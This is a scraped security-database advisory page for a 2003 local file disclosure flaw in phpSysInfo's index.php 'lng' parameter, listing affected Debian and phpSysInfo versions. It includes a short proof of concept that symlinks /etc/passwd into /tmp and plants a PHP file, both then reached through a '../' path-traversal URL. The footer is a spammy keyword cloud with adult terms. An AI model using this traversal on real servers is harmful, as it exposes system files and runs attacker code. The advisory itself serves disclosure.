about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHPSysInfo Index.PHP LNG File Disclosure Vulnerability


Title PHPSysInfo Index.PHP LNG File Disclosure Vulnerability
Published 2003-04-04-12:00AM
Updated 2003-11-24-06:37PM
Class Unknown
CVE   CVE-MAP-NOMATCH
Remote  No
Local  Yes
Credit  Discovery of this vulnerability has been credited to Albert Puigsech Galicia <ripe@7a69ezine.org>.
Vulnerable  phpSysInfo phpSysInfo 2.1
phpSysInfo phpSysInfo 2.0
Debian Linux 3.0
Debian Linux 3.0 alpha
Debian Linux 3.0 arm
Debian Linux 3.0 hppa
Debian Linux 3.0 ia32
Debian Linux 3.0 ia64
Debian Linux 3.0 m68k
Debian Linux 3.0 mips
Debian Linux 3.0 mipsel
Debian Linux 3.0 ppc
Debian Linux 3.0 s/390
Debian Linux 3.0 sparc
Not Vulnerable  
Code   The following proof of concept was provided:

~$ ln -s /etc/passwd /tmp/p.php
http://www.example.com/index.php?lng=../../../../tmp/p


~$ echo "<?php phpinfo() ?>" > /tmp/p.php
http://www.example.com/index.php?lng=../../../../tmp/p
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 23 Nov 2008 18:29:02 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Video sex ASHIK search/exp windows.hk sexclusive dabew WindWeb/2. www.trisha parameter news for c Girlshaves bokep _MYSQL 4. sexsemy PAKISTANI. SMF 1.1 exploit op vbulletin Club Seven Sexsy fili phpbb+1.5 woan ip board 2 willianeli www,com89 vBulletin asinsexvid ip board 2 old lady f yabb 1.4 www..waptr www.Indian eshop Microsoft Open free 9274 Crack Data www.sexlk. robots www.startp apache 2.0 Particle Www.xxxpow 200 /compo nude bolly Www.Lun fu technote t845t CMS is Fre CREU